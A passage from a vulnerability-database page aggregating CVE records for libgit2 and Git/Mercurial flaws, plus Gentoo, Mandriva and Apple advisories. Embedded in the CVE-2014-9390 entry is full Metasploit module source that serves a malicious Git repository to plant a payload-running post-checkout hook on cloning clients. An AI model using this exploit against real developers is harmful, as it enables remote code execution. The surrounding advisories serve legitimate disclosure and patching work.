STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1", }, { name: "https://libgit2.github.com/security/", refsource: "CONFIRM", url: "https://libgit2.github.com/security/", }, { name: "https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-8098", datePublished: "2018-03-14T00:00:00", dateReserved: "2018-03-13T00:00:00", dateUpdated: "2024-08-05T06:46:13.414Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-8099
Vulnerability from cvelistv5
Published
2018-03-14 00:00
Modified
2024-08-05 06:46
Severity ?
EPSS score ?
Summary
Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file.
References
| ▼ | URL | Tags |
|---|---|---|
| https://libgit2.github.com/security/ | x_refsource_CONFIRM | |
| https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe | x_refsource_CONFIRM | |
| https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | mailing-list, x_refsource_MLIST |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T06:46:12.249Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://libgit2.github.com/security/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-03-13T00:00:00", descriptions: [ { lang: "en", value: "Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-03-21T02:06:16", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://libgit2.github.com/security/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-8099", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://libgit2.github.com/security/", refsource: "CONFIRM", url: "https://libgit2.github.com/security/", }, { name: "https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-8099", datePublished: "2018-03-14T00:00:00", dateReserved: "2018-03-13T00:00:00", dateUpdated: "2024-08-05T06:46:12.249Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
var-202002-0749
Vulnerability from variot
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. Successful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data.
Background
Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. ##
This module requires Metasploit: http://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell
def initialize(info = {}) super(update_info( info, 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', 'Description' => %q( This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities.
On operating systems which have case-insensitive file systems, like
Windows and OS X, Git clients can be convinced to retrieve and
overwrite sensitive configuration files in the .git
directory which can allow arbitrary code execution if a vulnerable
client can be convinced to perform certain actions (for example,
a checkout) against a malicious Git repository.
The third vulnerability with similar characteristics only affects
Mercurial clients on Windows, where Windows "short names"
(MS-DOS-compatible 8.3 format) are supported.
Today this module only truly supports the first vulnerability (Git
clients on case-insensitive file systems) but has the functionality to
support the remaining two with a little work.
),
'License' => MSF_LICENSE,
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-9390'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],
['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']
],
'DisclosureDate' => 'Dec 18 2014',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp perl bash'
}
}
}
],
[
'Windows Powershell',
{
'Platform' => [ 'windows' ],
'Arch' => [ARCH_X86, ARCH_X86_64]
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('GIT', [true, 'Exploit Git clients', true])
]
)
register_advanced_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),
OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])
]
)
end
def setup # the exploit requires that we act enough like a real Mercurial HTTP instance, # so we keep a mapping of all of the files and the corresponding data we'll # send back along with a trigger file that signifies that the git/mercurial # client has fetched the malicious content. @repo_data = { git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } }
unless datastore['GIT'] || datastore['MERCURIAL']
fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
end
setup_git
setup_mercurial
super
end
def setup_git return unless datastore['GIT'] # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') end # sanity check the malicious hook: if datastore['GIT_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') end
# In .git/hooks/ directory, specially named files are shell scripts that
# are executed when particular events occur. For example, if
# .git/hooks/post-checkout was an executable shell script, a git client
# would execute that file every time anything is checked out. There are
# various other files that can be used to achieve similar goals but related
# to committing, updating, etc.
#
# This builds a fake git repository using the knowledge from:
#
# http://schacon.github.io/gitbook/7_how_git_stores_objects.html
# http://schacon.github.io/gitbook/7_browsing_git_objects.html
case target.name
when 'Automatic'
full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
when 'Windows Powershell'
psh = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
encode_final_payload: true)
full_cmd = "#!/bin/sh\n#{psh}"
end
sha1, content = build_object('blob', full_cmd)
trigger = "/objects/#{get_path(sha1)}"
@repo_data[:git][:trigger] = trigger
@repo_data[:git][:files][trigger] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
# which hooks live
variants = []
%w(g G). each do |g|
%w(i I).each do |i|
%w(t T).each do |t|
git = g + i + t
variants << git unless git.chars.none? { |c| c == c.upcase }
end
end
end
git_dir = '.' + variants.sample
sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
if datastore['VERBOSE']
vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
commit.each_line { |l| vprint_status(l.strip) }
end
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build HEAD
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
# lastly, build refs
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end
def setup_mercurial return unless datastore['MERCURIAL'] # URI must start with a / unless mercurial_uri && mercurial_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') end # sanity check the malicious hook if datastore['MERCURIAL_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') end # we fake the Mercurial HTTP protocol such that we are compliant as possible but # also as simple as possible so that we don't have to support all of the protocol # complexities. Taken from: # http://mercurial.selenic.com/wiki/HttpCommandProtocol # http://selenic.com/hg/file/tip/mercurial/wireproto.py @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n" # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
# TODO: finish building the fake repository
end
# Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end
# Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end
def exploit super end
def primer # add the git and mercurial URIs as necessary if datastore['GIT'] hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end if datastore['MERCURIAL'] hardcoded_uripath(mercurial_uri) print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}") end end
# handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version if (user_agent = req.headers['User-Agent']) if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end end
do_html(cli, req)
end
# simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) if req_file == @repo_data[:git][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end
# simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML Public Repositories
Here are our public repositories:
-
HTML
if datastore['GIT']
this_git_uri = URI.parse(get_uri).merge(git_uri)
resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
else
resp.body << "<li><a>Git</a> (currently offline)</li>"
end
if datastore['MERCURIAL']
this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
else
resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
end
resp.body << <<HTML
</ul>
</body>
</html>
HTML
cli.send_response(resp)
end
# simulates a Mercurial HTTP server def do_mercurial(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so uri = URI.parse(req.uri) req_path = uri.path req_path += "?#{uri.query}" if uri.query req_path.gsub!(/^#{mercurial_uri}/, '') if @repo_data[:mercurial][:files].key?(req_path) vprint_status("Sending Mercurial #{req_path}") send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') if req_path == @repo_data[:mercurial][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Mercurial #{req_path} doesn't exist") send_not_found(cli) end end
# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end
# Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI def mercurial_uri return @mercurial_uri if @mercurial_uri if datastore['MERCURIAL_URI'].blank? @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase else @mercurial_uri = datastore['MERCURIAL_URI'] end end end .
Gentoo Linux Security Advisory GLSA 201612-19
https://security.gentoo.org/
Severity: Normal Title: Mercurial: Multiple vulnerabilities Date: December 07, 2016 Bugs: #533008, #544332, #578546, #582238 ID: 201612-19
Synopsis
Multiple vulnerabilities have been found in Mercurial, the worst of which could lead to the remote execution of arbitrary code.
Background
Mercurial is a distributed source control management system.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/mercurial < 3.8.4 >= 3.8.4
Description
Multiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details.
Impact
A remote attacker could possibly execute arbitrary code with the privileges of the process.
Workaround
There is no known workaround at this time.
Resolution
All mercurial users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/mercurial-3.8.4"
References
[ 1 ] CVE-2014-9390 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390 [ 2 ] CVE-2014-9462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462 [ 3 ] CVE-2016-3068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068 [ 4 ] CVE-2016-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069 [ 5 ] CVE-2016-3105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105 [ 6 ] CVE-2016-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-19
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2015:169 http://www.mandriva.com/en/support/security/
Package : git Date : March 30, 2015 Affected: Business Server 2.0
Problem Description:
Updated git packages fix security vulnerability:
It was reported that git, when used as a client on a case-insensitive filesystem, could allow the overwrite of the .git/config file when the client performed a git pull. Because git permitted committing .Git/config (or any case variation), on the pull this would replace the user's .git/config.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390 http://advisories.mageia.org/MGASA-2014-0546.html
Updated Packages:
Mandriva Business Server 2/X86_64: ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm 10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm 879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm 1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm 8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm 2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm 39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm 35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm 644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm 261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX AknCsk/2slzIzxNpACLxeDI= =Vdej -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2015-03-09-4 Xcode 6.2
Xcode 6.2 is now available and addresses the following:
subversion Available for: OS X Mavericks v10.9.4 or later Impact: Multiple vulnerabilities in Apache Subversion Description: Multiple vulnerabilities existed in Apache Subversion, the most serious of which may have allowed an attacker with a privileged position to spoof SSL servers via a crafted certificate. These issues were addressed by updating Apache Subversion to version 1.7.19. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial
Xcode 6.2 may be obtained from: https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
- Select Xcode in the menu bar
- Select About Xcode
- The version after applying this update will be "6.2"
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0749", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "xcode", scope: "eq", trust: 1, vendor: "apple", version: "6.2", }, { model: "jgit", scope: "lt", trust: 1, vendor: "eclipse", version: "3.4.2", }, { model: "libgit2", scope: "lt", trust: 1, vendor: "libgit2", version: "0.21.3", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "1.9.0", }, { model: "xcode", scope: "lte", trust: 1, vendor: "apple", version: "6.1.1", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "2.2.1", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "2.2.0", }, { model: "egit", scope: "lt", trust: 1, vendor: "eclipse", version: "08-12-2014", }, { model: "jgit", scope: "lt", trust: 1, vendor: "eclipse", version: "3.5.3", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "2.1.4", }, { model: "mercurial", scope: "lt", trust: 1, vendor: "mercurial", version: "3.2.3", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "2.0.5", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "1.9.5", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "2.1.0", }, { model: "jgit", scope: "gte", trust: 1, vendor: "eclipse", version: "3.5.0", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "2.0.0", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "1.8.5.6", }, { model: "egit", scope: null, trust: 0.8, vendor: "eclipse", version: null, }, { model: "jgit", scope: null, trust: 0.8, vendor: "eclipse", version: null, }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "1.8.5.6", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "1.9.5", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "2.0.5", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "2.1.4", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "2.2.1", }, { model: "libgit2", scope: null, trust: 0.8, vendor: "libgit2", version: null, }, { model: "mercurial", scope: "eq", trust: 0.8, vendor: "mercurial", version: "3.2.3", }, { model: "xcode", scope: "eq", trust: 0.8, vendor: "apple", version: "6.2 beta 3", }, { model: "linux lts i386", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux lts amd64", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux", scope: null, trust: 0.3, vendor: "gentoo", version: null, }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.4.1", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "3.1", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "3.0", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.3", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.2", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.1", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.0", }, ], sources: [ { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:eclipse:egit", vulnerable: true, }, { cpe22Uri: "cpe:/a:eclipse:jgit", vulnerable: true, }, { cpe22Uri: "cpe:/a:git-scm:git", vulnerable: true, }, { cpe22Uri: "cpe:/a:libgit2_project:libgit2", vulnerable: true, }, { cpe22Uri: "cpe:/a:mercurial:mercurial", vulnerable: true, }, { cpe22Uri: "cpe:/a:apple:xcode", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2014-008933", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Matt Mackall and Augie Fackler", sources: [ { db: "BID", id: "71732", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], trust: 0.9, }, cve: "CVE-2014-9390", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": 